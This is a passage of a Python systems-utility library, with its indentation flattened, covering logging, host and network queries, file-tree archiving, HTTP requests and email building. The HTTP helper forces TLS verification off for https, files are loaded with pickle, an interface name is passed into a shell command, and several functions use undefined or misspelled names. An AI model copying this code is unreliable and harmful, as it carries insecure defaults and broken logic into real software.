def Screen(self,log_str,log_level):
if log_level in ['error']:
sys.stderr.write(log_str)
sys.stderr.flush()
elif log_level <= self.limit:
sys.stdout.write(log_str)
sys.stdout.flush()
def Log(self,*msg,**opts):
direct=opts.get('direct',False)
func_name=opts.get('func_name',None)
date_format=opts.get('date_format','[%m/%d/%Y %H:%M:%S]')
start_new_line=opts.get('start_new_line','\n')
end_new_line=opts.get('end_new_line','')
log_level=opts.get('log_level',3)
special_file=opts.get('filename',None)
screen=opts.get('screen',None)
syslogd=opts.get('syslogd',None)
if msg:
# send log at syslogd
self.Syslogd(*msg,syslogd=syslogd)
if date_format in [False,None,'','no','ignore']:
date_format=None
if func_name in [False,None,'','no','ignore']:
func_name=None
if direct:
log_str=' '.join(msg)
else:
log_str=self.Format(*msg,func_name=func_name,date_format=date_format,end_new_line=end_new_line,start_new_line=start_new_line)
# Saving log at file
log_file=self.File(log_str,log_level,special_file=special_file)
# print at screen
if screen is True or (screen is None and self.screen is True):
self.Screen(log_str,log_level)
# Send Log Data to logging function (self.log_file)
if log_file is None:
self.Function(log_str)
def Function(self,*msg,**opts):
if type(self.log_file).__name__ == 'function':
log_func_arg=get_function_args(self.log_file,mode='all')
if 'args' in log_func_arg or 'varargs' in log_func_arg:
log_p=True
args=log_func_arg.get('args',[])
if args and len(args) <= 4 and ('direct' in args or 'log_level' in args or 'func_name' in args):
tmp=[]
for i in range(0,len(args)):
tmp.append(i)
if 'direct' in args:
didx=args.index('direct')
del tmp[didx]
args[didx]=direct
if 'log_level' in args:
lidx=args.index('log_level')
del tmp[lidx]
args[lidx]=log_level
if 'func_name' in args:
lidx=args.index('func_name')
del tmp[lidx]
args[lidx]=func_name
if 'date_format' in args:
lidx=args.index('date_format')
del tmp[lidx]
args[lidx]=date_format
args[tmp[0]]=log_str
self.log_file(*args)
elif 'keywards' in log_func_arg:
self.log_file(log_str,direct=direct,log_level=log_level,func_name=func_name,date_format=date_format)
elif 'defaults' in log_func_arg:
if 'direct' in log_func_arg['defaults'] and 'log_level' in log_func_arg['defaults']:
self.log_file(log_str,direct=direct,log_level=log_level)
elif 'log_level' in log_func_arg['defaults']:
self.log_file(log_str,log_level=log_level)
elif 'direct' in log_func_arg['defaults']:
self.log_file(log_str,direct=direct)
else:
self.log_file(log_str)
else:
self.log_file(log_str)
class HOST:
def __init__(self):
pass
def Name(self):
return socket.gethostname()
def NetIp(self,ifname):
if os.path.isdir('/sys/class/net/{}'.format(ifname)) is False:
return False
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
except:
try:
return os.popen('ip addr show {}'.format(ifname)).read().split("inet ")[1].split("/")[0]
except:
return
def Ip(self,ifname=None,mac=None,default=None):
if mac is None : mac=self.Mac()
if ifname is None: ifname=get_dev_name_from_mac(mac)
ip=self.NetIp(ifname)
if ip: return ip
return socket.gethostbyname(socket.gethostname())
def IpmiIp(self,default=None):
rt=SHELL().Run('''ipmitool lan print 2>/dev/null| grep "IP Address" | grep -v Source | awk '{print $4}' ''')
if rt[0]:return rt[1]
return default
def IpmiMac(self,default=None):
rt=SHELL().Run(""" ipmitool lan print 2>/dev/null | grep "MAC Address" | awk """ + """ '{print $4}' """)
if rt[0]:return rt[1]
return default
def DevMac(self,ifname,default=None):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
except:
return default
def Mac(self,ip=None,dev=None,default=None):
if IP(ip).IsV4():
dev_info=self.NetDevice()
for dev in dev_info.keys():
if self.NetIp(dev) == ip:
return dev_info[dev]['mac']
elif dev:
return self.DevMac(dev)
else:
#return ':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff) for ele in range(0,8*6,8)][::-1])
return CONVERT('%012x' % uuid.getnode()).Str2Mac()
return default
def DevName(self,mac=None,default=None):
if mac is None:
mac=self.Mac()
net_dir='/sys/class/net'
if isinstance(mac,str) and os.path.isdir(net_dir):
dirpath,dirnames,filenames = list(os.walk(net_dir))[0]
for dev in dirnames:
fmac=cat('{}/{}/address'.format(dirpath,dev),no_end_newline=True)
if isinstance(fmac,str) and fmac.strip().lower() == mac.lower():
return dev
return default
def NetIP(ifname,default=None):
if not os.path.isdir('/sys/class/net/{}'.format(ifname)):
return default
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
except:
try:
return os.popen('ip addr show {}'.format(ifname)).read().split("inet ")[1].split("/")[0]
except:
pass
return default
def Info(self):
return {
'host_name':self.Name(),
'host_ip':self.Ip(),
'host_mac':self.Mac(),
'ipmi_ip':self.IpmiIp(),
'ipmi_mac':self.IpmiMac(),
}
def NetDevice(self,name=None):
net_dev={}
net_dir='/sys/class/net'
if os.path.isdir(net_dir):
dirpath,dirnames,filenames = list(os.walk(net_dir))[0]
if name:
if name in dirnames:
drv=ls('{}/{}/device/driver/module/drivers'.format(dirpath,name))
if drv is False:
drv='unknown'
else:
drv=drv[0].split(':')[1]
net_dev[name]={
'mac':cat('{}/{}/address'.format(dirpath,name),no_end_newline=True),
'duplex':cat('{}/{}/duplex'.format(dirpath,name),no_end_newline=True),
'mtu':cat('{}/{}/mtu'.format(dirpath,name),no_end_newline=True),
'state':cat('{}/{}/operstate'.format(dirpath,name),no_end_newline=True),
'speed':cat('{}/{}/speed'.format(dirpath,name),no_end_newline=True),
'id':cat('{}/{}/ifindex'.format(dirpath,name),no_end_newline=True),
'driver':drv,
'drv_ver':cat('{}/{}/device/driver/module/version'.format(dirpath,name),no_end_newline=True),
}
else:
for dev in dirnames:
drv=ls('{}/{}/device/driver/module/drivers'.format(dirpath,dev))
if drv is False:
drv='unknown'
else:
drv=drv[0].split(':')[1]
net_dev[dev]={
'mac':cat('{}/{}/address'.format(dirpath,dev),no_end_newline=True),
'duplex':cat('{}/{}/duplex'.format(dirpath,dev),no_end_newline=True),
'mtu':cat('{}/{}/mtu'.format(dirpath,dev),no_end_newline=True),
'state':cat('{}/{}/operstate'.format(dirpath,dev),no_end_newline=True),
'speed':cat('{}/{}/speed'.format(dirpath,dev),no_end_newline=True),
'id':cat('{}/{}/ifindex'.format(dirpath,dev),no_end_newline=True),
'driver':drv,
'drv_ver':cat('{}/{}/device/driver/module/version'.format(dirpath,dev),no_end_newline=True),
}
return net_dev
else:
return False
def Alive(self,ip,keep=20,interval=3,timeout=1800,default=False,log=None,cancel_func=None):
return IP(ip).Online(keep=keep,interval=interval,timeout=timeout,default=default,log=log,cancel_func=cancel_func)[1]
def Ping(self,ip,keep_good=10,timeout=3600):
return IP(ip).Ping(keep_good=10,timeout=timeout)
class FILE:
'''
sub_dir : True (Get files in recuring directory)
data : True (Get File Data)
md5sum : True (Get File's MD5 SUM)
link2file: True (Make a real file instead sym-link file)
'''
def __init__(self,*inp,**opts):
self.root_path=opts.get('root_path',None)
#if self.root_path is None: self.root_path=os.path.dirname(os.path.abspath(__file__))
if self.root_path is None: self.root_path=self.Path()
info=opts.get('info',None)
if isinstance(info,dict):
self.info=info
else:
self.info={}
sub_dir=opts.get('sub_dir',opts.get('include_sub_dir',opts.get('include_dir',False)))#???
data=opts.get('data',False)
md5sum=opts.get('md5sum',False)
link2file=opts.get('link2file',False) # If True then copy file-data of sym-link file, so get it real file instead of sym-link file
self.filelist={}
for filename in inp:
root,flist=self.FileList(filename,sub_dir=sub_dir,dirname=True)
if root not in self.filelist: self.filelist[root]=[]
self.filelist[root]=self.filelist[root]+flist
for ff in self.filelist:
self.info.update(self.Get(ff,*self.filelist[ff],data=data,md5sum=md5sum,link2file=link2file))
def FileList(self,name,sub_dir=False,dirname=False,default=[]):
if isinstance(name,str):
if name[0] == '/': # Start from root path
if os.path.isfile(name) or os.path.islink(name): return os.path.dirname(name),[os.path.basename(name)]
if os.path.isdir(name):
if sub_dir:
rt = []
pwd=os.getcwd()
os.chdir(name)
for base, dirs, files in os.walk('.'):
if dirname: rt.extend(os.path.join(base[2:], d) for d in dirs)
rt.extend(os.path.join(base[2:], f) for f in files)
os.chdir(pwd)
return Path(name),rt
else:
return Path(name),[f for f in os.listdir(name)]
elif self.root_path: # start from defined root path
#chk_path=os.path.join(self.root_path,name)
chk_path=Path(self.root_path,name)
if os.path.isfile(chk_path) or os.path.islink(chk_path): return Path(self.root_path),[name]
if os.path.isdir(chk_path):
if sub_dir:
rt = []
pwd=os.getcwd()
os.chdir(self.root_path) # Going to defined root path
# Get recuring file list of the name (when current dir then '.')
for base, dirs, files in os.walk(name):
if dirname: rt.extend(os.path.join(base[2:], d) for d in dirs)
rt.extend(os.path.join(base[2:], f) for f in files)
os.chdir(pwd) # recover to the original path
return Path(self.root_path),rt
else:
if name == '.': name=''
return Path(self.root_path),[os.path.join(name,f) for f in os.listdir('{}/{}'.format(self.root_path,name))]
return default
def CdPath(self,base,path):
rt=base
for ii in path.split('/'):
if ii not in rt: return False
rt=rt[ii]
return rt
def FileName(self,filename):
if isinstance(filename,str):
filename_info=os.path.basename(filename).split('.')
if 'tar' in filename_info:
idx=filename_info.index('tar')
else:
idx=-1
return '.'.join(filename_info[:idx]),'.'.join(filename_info[idx:])
return None,None
def FileType(self,filename,default=False):
if not isinstance(filename,str) or not os.path.isfile(filename): return default
aa=magic.from_buffer(open(filename,'rb').read(2048))
if aa: return aa.split()[0].lower()
return 'unknown'
def GetInfo(self,path=None,*inps):
if isinstance(path,str):
if not self.info and os.path.exists(path):
data={}
self.MkInfo(data,path)
else:
data=self.CdPath(path)
if isinstance(data,dict):
if not inps and ' i ' in data: return data[' i ']
rt=[]
for ii in inps:
if ii == 'data' and ii in data: rt.append(data[ii])
if ' i ' in data and ii in data[' i ']: rt.append(data[' i '][ii])
return rt
def Get(self,root_path,*filenames,**opts):
data=opts.get('data',False)
md5sum=opts.get('md5sum',False)
link2file=opts.get('link2file',False)
base={}
def MkInfo(rt,filename=None,**opts):
#if not isinstance(rt,dict) or not isinstance(filename,str): return default
if ' i ' not in rt: rt[' i ']={}
if filename:
state=os.stat(filename)
rt[' i ']['exist']=True
rt[' i ']['size']=state.st_size
rt[' i ']['mode']=oct(state.st_mode)[-4:]
rt[' i ']['atime']=state.st_atime
rt[' i ']['mtime']=state.st_mtime
rt[' i ']['ctime']=state.st_ctime
rt[' i ']['gid']=state.st_gid
rt[' i ']['uid']=state.st_uid
if opts: rt[' i '].update(opts)
def MkPath(base,path,root_path):
rt=base
chk_dir='{}'.format(root_path)
for ii in path.split('/'):
if ii:
chk_dir=Path(chk_dir,ii)
if ii not in rt:
rt[ii]={}
if os.path.isdir(chk_dir): MkInfo(rt[ii],chk_dir,type='dir')
rt=rt[ii]
return rt
for filename in filenames:
tfilename=Path(root_path,filename)
if os.path.exists(tfilename):
rt=MkPath(base,filename,root_path)
if os.path.islink(tfilename): # it is a Link File
if os.path.isfile(filename): # it is a File
if link2file:
name,ext=self.FileName(tfilename)
_md5=None
if data or md5sum: # MD5SUM or Data
filedata=self.Rw(tfilename,out='byte')
if filedata[0]:
if data: rt['data']=filedata[1]
if md5sum: _md5=md5(filedata[1])
MkInfo(rt,filename=tfilename,type=self.FileType(tfilename),name=name,ext=ext,md5=_md5)
else:
MkInfo(rt,filename=tfilename,type='link',dest=os.readlink(tfilename))
elif os.path.isdir(tfilename): # it is a directory
MkInfo(rt,tfilename,type='dir')
elif os.path.isfile(tfilename): # it is a File
name,ext=self.FileName(tfilename)
_md5=None
if data or md5sum: # MD5SUM or Data
filedata=self.Rw(tfilename,out='byte')
if filedata[0]:
if data: rt['data']=filedata[1]
if md5sum: _md5=md5(filedata[1])
MkInfo(rt,filename=tfilename,type=self.FileType(tfilename),name=name,ext=ext,md5=_md5)
else:
MkInfo(rt,filename,exist=False)
if base:
return {root_path:base}
return {}
def GetInfoFile(self,name,roots=None): #get file info dict from Filename path
if roots is None: roots=self.FindRP()
if isinstance(name,str):
for root in roots:
rt=self.info.get(root,{})
for ii in name.split('/'):
if ii not in rt: break
rt=rt[ii]
fileinfo=rt.get(' i ',{})
if fileinfo: return fileinfo
return False
def GetList(self,name=None,roots=None): #get file info dict from Filename path
if roots is None: roots=self.FindRP()
for root in roots:
if isinstance(root,str):
rt=self.info.get(root,{})
if name != root:
rt=self.CdPath(rt,name)
if isinstance(rt,dict):
for ii in rt:
if ii == ' i ': continue
if rt[ii].get(' i ',{}).get('type') == 'dir':
print(ii+'/')
else:
print(ii)
return False
def GetFileList(self,name=None,roots=None): #get file info dict from Filename path
if roots is None: roots=self.FindRP()
for root in roots:
if isinstance(root,str):
rt=self.info.get(root,{})
if name != root:
rt=self.CdPath(rt,name)
if isinstance(rt,dict):
for ii in rt:
if ii == ' i ': continue
if rt[ii].get(' i ',{}).get('type') == 'dir': continue
print(ii)
return False
def ExecFile(self,filename,bin_name=None,default=None,work_path='/tmp'):
# check the filename is excutable in the system bin file then return the file name
# if compressed file then extract the file and find bin_name file in the extracted directory
# and found binary file then return then binary file path
# if filename is excutable file then return the file path
# if not found then return default value
exist=self.GetInfoFile(filename)
if exist:
if exist['type'] in ['elf'] and exist['mode'] == 33261:return filename
if self.Extract(filename,work_path=work_path):
if bin_name:
rt=[]
for ff in self.Find(work_path,filename=bin_name):
if self.Info(ff).get('mode') == 33261:
rt.append(ff)
return rt
else:
if find_executable(filename): return filename
return default
def Basename(self,filename,default=False):
if isinstance(filename,str):return os.path.basename(filename)
return default
def Dirname(self,filename,bin_name=None,default=False):
if not isinstance(filename,str): return default
if bin_name is None: return os.path.dirname(filename)
if not isinstance(bin_name,str): return default
bin_info=bin_name.split('/')
bin_n=len(bin_info)
filename_info=filename.split('/')
filename_n=len(filename_info)
for ii in range(0,bin_n):
if filename_info[filename_n-1-ii] != bin_info[bin_n-1-ii]: return default
return '/'.join(filename_info[:-bin_n])
def Find(self,filename,default=[]):
if not isinstance(filename,str): return default
filename=os.path.basename(filename)
if os.path.isdir(self.root_path):
rt = []
for base, dirs, files in os.walk(self.root_path):
found = fnmatch.filter(files, filename)
rt.extend(os.path.join(base, f) for f in found)
return rt
return default
# def Decompress(self,filename,work_path='/tmp',info={},del_org_file=False):
# if not info and isinstance(filename,str) and os.path.isfile(filename): info=self.Get(filename)
# filetype=info.get('type',None)
# fileext=info.get('ext',None)
# if filetype and fileext:
# # Tar stuff
# if fileext in ['tgz','tar','tar.gz','tar.bz2','tar.xz'] and filetype in ['gzip','tar','bzip2','lzma','xz','bz2']:
# tf=tarfile.open(filename)
# tf.extractall(work_path)
# tf.close()
# elif fileext in ['zip'] and filetype in ['compress']:
# with zipfile.ZipFile(filename,'r') as zf:
# zf.extractall(work_path)
# if del_org_file: os.unline(filename)
# return True
# return False
def Rw(self,name,data=None,out='byte',append=False,read=None,overwrite=True,finfo={}):
if isinstance(name,str):
if data is None: # Read from file
if os.path.isfile(name):
try:
if read in ['firstread','firstline','first_line','head','readline']:
with open(name,'rb') as f:
data=f.readline()
else:
with open(name,'rb') as f:
data=f.read()
if out in ['string','str']:
return True,CONVERT(data).Str()
else:
return True,data
except:
pass
return False,'File({}) not found'.format(name)
else: # Write to file
file_path=os.path.dirname(name)
if not file_path or os.path.isdir(file_path): # current dir or correct directory
# try:
if append:
with open(name,'ab') as f:
f.write(BYTES().From(data))
else:
with open(name,'wb') as f:
f.write(BYTES().From(data))
if isinstance(finfo,dict) and finfo: self.SetIdentity(name,**finfo)
#mode=self.Mode(mode)
#if mode: os.chmod(name,int(mode,base=8))
#if uid and gid: os.chown(name,uid,gid)
#if mtime and atime: os.utime(name,(atime,mtime))# Time update must be at last order
return True,None
# except:
# pass
return False,'Directory({}) not found'.format(file_path)
return False,'Unknown type({}) filename'.format(name)
def Mode(self,val,default=False):
if isinstance(val,int):
#if val >= 32768: # stat
if val > 511:
return oct(val)[-4:]
elif val > 63: # mask
return oct(val)
elif isinstance(val,str):
try:
cnt=len(val)
val=int(val)
if cnt >=3 and cnt <=4 and val >= 100 and val <= 777: # string type of permission number
return '%04d'%(val)
#return int(val,8)
except: # permission string
if len(val) != 9: return 'Bad permission length'
if not all(val[k] in 'rw-' for k in [0,1,3,4,6,7]): return 'Bad permission format (read-write)'
if not all(val[k] in 'xs-' for k in [2,5]): return 'Bad permission format (execute)'
if val[8] not in 'xt-': return 'Bad permission format (execute other)'
m = 0
if val[0] == 'r': m |= stat.S_IRUSR
if val[1] == 'w': m |= stat.S_IWUSR
if val[2] == 'x': m |= stat.S_IXUSR
if val[2] == 's': m |= stat.S_IXUSR | stat.S_ISUID
if val[3] == 'r': m |= stat.S_IRGRP
if val[4] == 'w': m |= stat.S_IWGRP
if val[5] == 'x': m |= stat.S_IXGRP
if val[5] == 's': m |= stat.S_IXGRP | stat.S_ISGID
if val[6] == 'r': m |= stat.S_IROTH
if val[7] == 'w': m |= stat.S_IWOTH
if val[8] == 'x': m |= stat.S_IXOTH
if val[8] == 't': m |= stat.S_IXOTH | stat.S_ISVTX
return oct(m)
return default
# Find filename's root path and filename according to the db
def FindRP(self,filename=None,default=None):
if isinstance(filename,str) and self.info:
info_keys=list(self.info.keys())
info_num=len(info_keys)
if filename[0] != '/':
if info_num == 1: return info_keys[0]
return self.root_path
aa='/'
filename_a=filename.split('/')
for ii in range(1,len(filename_a)):
aa=Path(aa,filename_a[ii])
if aa in info_keys:
remain_path='/'.join(filename_a[ii+1:])
if info_num == 1: return aa,remain_path
# if info has multi root path then check filename in the db of each root_path
if self.GetInfoFile(remain_path,aa): return aa,remain_path
elif self.info:
return list(self.info.keys())
return default
def ExtractRoot(self,**opts):
root_path=opts.get('root_path',[])
dirpath=opts.get('dirpath')
sub_dir=opts.get('sub_dir',False)
if isinstance(root_path,str):
root_path=[root_path]
#if not os.path.isdir(opts.get('dest')): os.makedirs(opts.get('dest'))
if self.Mkdir(opts.get('dest'),force=True) is False: return False
for rp in root_path:
new_dest=opts.get('dest')
if dirpath:
rt=self.CdPath(self.info[rp],dirpath)
if rt is False:
print('{} not found'.format(dirpath))
return
else:
dirpath=''
rt=self.info[rp]
rinfo=rt.get(' i ',{})
rtype=rinfo.get('type')
#dir:directory,None:root directory
if rtype not in ['dir',None]: # File / Link
mydest=os.path.dirname(dirpath)
myname=os.path.basename(dirpath)
if mydest:
mydest=os.path.join(new_dest,mydest)
else:
mydest=new_dest
#if not os.path.isdir(mydest): os.makedirs(mydest)
if self.Mkdir(mydest,force=True,info=rinfo) is False: return False
if rtype == 'link':
os.symlink(rinfo['dest'],os.path.join(mydest,myname))
self.SetIdentity(os.path.join(mydest,myname),**rinfo)
else: # File
if 'data' in rt: self.Rw(Path(mydest,myname),data=rt['data'],finfo=rinfo)
else: print('{} file have no data'.format(dirpath))
# self.SetIdentity(os.path.join(mydest,myname),**rinfo)
else: # directory or root DB
for ii in rt:
if ii == ' i ': continue
finfo=rt[ii].get(' i ',{})
ftype=finfo.get('type')
if ftype == 'dir':
mydir=os.path.join(new_dest,ii)
self.Mkdir(mydir,force=True,info=finfo)
#self.SetIdentity(mydir,**finfo)
# Sub directory
if sub_dir: self.ExtractRoot(dirpath=os.path.join(dirpath,ii),root_path=rp,dest=os.path.join(new_dest,ii),sub_dir=sub_dir)
#if dmtime and datime: os.utime(mydir,(datime,dmtime)) # Time update must be at last order
elif ftype == 'link':
iimm=os.path.join(new_dest,ii)
if not os.path.exists(iimm):
os.symlink(finfo['dest'],iimm)
self.SetIdentity(iimm,**finfo)
else: # File
if 'data' in rt[ii]: self.Rw(os.path.join(new_dest,ii),data=rt[ii]['data'],finfo=finfo)
else: print('{} file have no data'.format(ii))
def Mkdir(self,path,force=False,info={}):
if not isinstance(path,str): return None
if os.path.exists(path): return None
if force:
try:
os.makedirs(path)
if isinstance(info,dict) and info: self.SetIdentity(path,**info)
except:
return False
else:
try:
os.mkdir(path)
if isinstance(info,dict) and info: self.SetIdentity(path,**info)
except:
return False
return True
def MkTemp(self,filename=None,suffix='-XXXXXXXX',opt='dry',base_dir='/tmp',custom=None):
if filename is None:
filename=os.path.join(base_dir,Random(length=len(suffix)-1,strs=custom,mode='str'))
dir_name=os.path.dirname(filename)
file_name=os.path.basename(filename)
name, ext = os.path.splitext(file_name)
if type(suffix) is not str:
suffix='-XXXXXXXX'
num_type='.%0{}d'.format(len(suffix)-1)
if dir_name == '.':
dir_name=os.path.dirname(os.path.realpath(__file__))
elif dir_name == '':
dir_name=base_dir
def new_name(name,ext=None,ext2=None):
if ext:
if ext2:
return '{}{}{}'.format(name,ext,ext2)
return '{}{}'.format(name,ext)
if ext2:
return '{}{}'.format(name,ext2)
return name
def new_dest(dest_dir,name,ext=None):
if os.path.isdir(dest_dir) is False:
return False
i=0
new_file=new_name(name,ext)
while True:
rfile=os.path.join(dest_dir,new_file)
if os.path.exists(rfile) is False:
return rfile
if suffix:
if '0' in suffix or 'n' in suffix or 'N' in suffix:
if suffix[-1] not in ['0','n']:
new_file=new_name(name,num_type%i,ext)
else:
new_file=new_name(name,ext,num_type%i)
elif 'x' in suffix or 'X' in suffix:
rnd_str='.{}'.format(Random(length=len(suffix)-1,mode='str'))
if suffix[-1] not in ['X','x']:
new_file=new_name(name,rnd_str,ext)
else:
new_file=new_name(name,ext,rnd_str)
else:
if i == 0:
new_file=new_name(name,ext,'.{}'.format(suffix))
else:
new_file=new_name(name,ext,'.{}.{}'.format(suffix,i))
else:
new_file=new_name(name,ext,'.{}'.format(i))
i+=1
new_dest_file=new_dest(dir_name,name,ext)
if opt in ['file','f']:
os.mknode(new_dest_file)
elif opt in ['dir','d','directory']:
os.mkdir(new_dest_file)
else:
return new_dest_file
def SetIdentity(self,path,**opts):
if os.path.exists(path):
chmod=self.Mode(opts.get('mode',None))
uid=opts.get('uid',None)
gid=opts.get('gid',None)
atime=opts.get('atime',None)
mtime=opts.get('mtime',None)
try:
if chmod: os.chmod(path,int(chmod,base=8))
if uid and gid: os.chown(path,uid,gid)
if mtime and atime: os.utime(path,(atime,mtime)) # Time update must be at last order
except:
pass
def Extract(self,*path,**opts):
dest=opts.get('dest',None)
root_path=opts.get('root_path',None)
sub_dir=opts.get('sub_dir',False)
if dest is None: return False
if not path:
self.ExtractRoot(root_path=self.FindRP(),dest=dest,sub_dir=sub_dir)
else:
for filepath in path:
fileRF=self.FindRP(filepath)
if isinstance(fileRF,tuple):
root_path=[fileRF[0]]
filename=fileRF[1]
self.ExtractRoot(root_path=root_path,dirpath=filename,dest=dest,sub_dir=sub_dir)
elif isinstance(fileRF,list):
self.ExtractRoot(root_path=fileRF,dest=dest,sub_dir=sub_dir)
def Save(self,filename):
pv=b'3'
if PyVer(2): pv=b'2'
#self.Rw(filename,data=pv+bz2.compress(pickle.dumps(self.info,protocol=2)))
self.Rw(filename,data=pv+Compress(pickle.dumps(self.info,protocol=2),mode='lz4'))
def Open(self,filename):
if not os.path.isfile(filename):
print('{} not found'.format(filename))
return False
data=self.Rw(filename)
if data[0]:
pv=data[1][0]
if pv == '3' and PyVer(2):
print('The data version is not matched. Please use Python3')
return False
# decompress data
try:
#dcdata=bz2.BZ2Decompressor().decompress(data[1][1:])
dcdata=Decompress(data[1][1:],mode='lz4')
except:
print('This is not KFILE format')
return False
try:
self.info=pickle.loads(dcdata) # Load data
except:
try:
self.info=pickle.loads(dcdata,encoding='latin1') # Convert 2 to 3 format
except:
print('This is not KFILE format')
return False
else:
print('Can not read {}'.format(filename))
return False
def Cd(self,data,path,sym='/'):
if Type(data,'module') and data == os:
if isinstance(path,str):
data.chdir(path)
return data
else:
if isinstance(path,int): path='{}'.format(path)
for ii in path.split(sym):
if isinstance(data,dict):
if ii in data:
data=data[ii]
elif isinstance(data,(list,tuple)):
if not isinstance(ii,str) or not ii.isdigit(): continue
ii=int(ii)
if len(data) > ii:
data=data[ii]
return data
def Path(self,filanem=None):
if filanem:
return os.path.dirname(os.path.realpath(filename))
return os.path.dirname(os.path.realpath((inspect.stack()[-1])[1]))
#if '__file__' in globals() : return os.path.dirname(os.path.realpath(__file__))
def Rm(self,filelist):
if isinstance(filelist,str):
filelist=filelist.split(',')
if isinstance(filelist,(list,tuple)):
for ii in list(filelist):
if os.path.isfile(ii):
os.unlink(ii)
else:
print('not found {0}'.format(ii))
class WEB:
def __init__(self,request=None):
if request:
self.requests=request
else:
self.requests=requests
def Session(self):
return self.requests.session._get_or_create_session_key()
def ClientIp(self):
x_forwarded_for = self.requests.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
else:
ip = self.requests.META.get('REMOTE_ADDR')
return ip
def ServerIp(self):
return self.requests.get_host().split(':')
def Request(self,host_url,**opts):
# remove SSL waring error message (test)
self.requests.packages.urllib3.disable_warnings()
mode=opts.get('mode','get')
max_try=opts.get('max_try',3)
auth=opts.get('auth',None)
user=opts.get('user',None)
ip=opts.get('ip',None)
port=opts.get('port',None)
passwd=opts.get('passwd',None)
timeout=opts.get('timeout',None)
https=opts.get('https',False)
verify=opts.get('verify',True)
request_url=opts.get('request_url',None)
log=opts.get('log',None)
log_level=opts.get('log_level',8)
logfile=opts.get('logfile',None)
ping=opts.get('ping',False)
if https:
verify=False
if auth is None and user and passwd:
if type(user) is not str or type(passwd) is not str:
printf("user='<user>',passwd='<pass>' : format(each string)",dsp='e',log=log,log_level=log_level,logfile=logfile)
return False,"user='<user>',passwd='<pass>' : format(each string)"
auth=(user,passwd)
if auth and type(auth) is not tuple:
printf("auth=('<user>','<pass>') : format(tuple)",dsp='e',log=log,log_level=log_level,logfile=logfile)
return False,"auth=('<user>','<pass>') : format(tuple)"
data=opts.get('data',None) # dictionary format
if data and type(data) is not dict:
printf("data={'<key>':'<val>',...} : format(dict)",dsp='e',log=log,log_level=log_level,logfile=logfile)
return False,"data={'<key>':'<val>',...} : format(dict)"
json_data=opts.get('json',None) # dictionary format
if json_data and type(json_data) is not dict:
printf("data={'<key>':'<val>',...} : format(dict)",dsp='e',log=log,log_level=log_level,logfile=logfile)
return False,"json={'<key>':'<val>',...} : format(dict)"
files=opts.get('files',None) # dictionary format
if files and type(files) is not dict:
printf("files = { '<file parameter name>': (<filename>, open(<filename>,'rb'))} : format(dict)",dsp='e',log=log,log_level=log_level,logfile=logfile)
return False,"files = { '<file parameter name>': (<filename>, open(<filename>,'rb'))} : format(dict)"
if type(host_url) is str:
chk_dest=re.compile('http[s]://([a-zA-Z0-9.]*)[:/]').findall(host_url)
if len(chk_dest): chk_dest=chk_dest[0]
if host_url.find('https://') == 0:
verify=False
elif ip:
chk_dest='{}'.format(ip)
if verify:
host_url='http://{}'.format(ip)
else:
host_url='https://{}'.format(ip)
if port:
host_url='{}:{}'.format(host_url,port)
if request_url:
host_url='{}/{}'.format(host_url,request_url)
else:
return False,'host_url or ip not found'
if ping and chk_dest:
if not ping(chk_dest,timeout_sec=3):
return False,'Can not access to destination({})'.format(chk_dest)
ss = self.requests.Session()
for j in range(0,max_try):
if mode == 'post':
try:
r =ss.post(host_url,verify=verify,auth=auth,data=data,files=files,timeout=timeout,json=json_data)
return True,r
except:
pass
else:
try:
r =ss.get(host_url,verify=verify,auth=auth,data=data,files=files,timeout=timeout,json=json_data)
return True,r
except:
pass
#except requests.exceptions.RequestException as e:
host_url_a=host_url.split('/')[2]
server_a=host_url_a.split(':')
if len(server_a) == 1:
printf("Server({}) has no response (wait {}/{} (10s))".format(server_a[0],j,max_try),dsp='e',log=log,log_level=log_level,logfile=logfile)
else:
printf("Server({}:{}) has no response (wait {}/{} (10s))".format(server_a[0],server_a[1],j,max_try),dsp='e',log=log,log_level=log_level,logfile=logfile)
TIME().Sleep(10)
return False,'TimeOut'
def str2url(self,string):
if string is None: return ''
if type(string) is str:
return string.replace('+','%2B').replace('?','%3F').replace('/','%2F').replace(':','%3A').replace('=','%3D').replace(' ','+')
return string
class EMAIL:
# Port Info
# GMAIL TTLS : 587
# Postfix : 25
def __init__(self,server='127.0.0.1',port=25,user=None,password=None,ssl=False,tls=False):
self.server=server
self.port=port
self.user=user
self.password=password
self.ssl=ssl
self.tls=tls
def Body(self,sender,receivers,title,msg,filename=None,html=False):
if isinstance(receivers,str):
receivers=receivers.split(',')
if not isinstance(receivers,list):
print('To mailing list issue')
return False
if filename:
_body=MIMEMultipart()
if isinstance(sender,tuple) and len(sender) == 2:
#format: ('NAME',EMAIL)
_body['From'] = email.utils.formataddr(sender)
else:
_body['From'] = sender
if isinstance(receivers[0],tuple) and len(receivers[0]) == 2:
#format: ('NAME',EMAIL)
_body['To'] = email.utils.formataddr(receivers[0])
else:
_body['To'] = receivers[0]
_body['Subject'] = title
if html:
_body.attach(MIMEText(msg, "html"))
else:
_body.attach(MIMEText(msg, "plain"))
with open(filename,'rb') as attachment:
part=MIMEBase("application", "octet-stream")
part.set_payload(attachment.read())
encoders.encode_base64(part)
part.add_header("Content-Disposition",f"attachment; filename= {filename}",)
_body.attach(part)
else:
if html:
_body=MIMEMultipart('alternative')
_body.attach(MIMEText(msg,'html'))
else:
_body = MIMEText(msg)
_body['Subject'] = title
if isinstance(sender,tuple) and len(sender) == 2:
#format: ('NAME',EMAIL)
_body['From'] = email.utils.formataddr(sender)
else:
_body['From'] = sender
if isinstance(receivers[0],tuple) and len(receivers[0]) == 2:
#format: ('NAME',EMAIL)
_body['To'] = email.utils.formataddr(receivers[0])
else:
_body['To'] = receivers[0]
return _body.as_string()
def Server(self):
if self.ssl:
if not self.password:
print('It required mail server({}) login password'.format(self.server))
return False
context = ssl.create_default_context()
if self.user is None: self.user=sender
try:
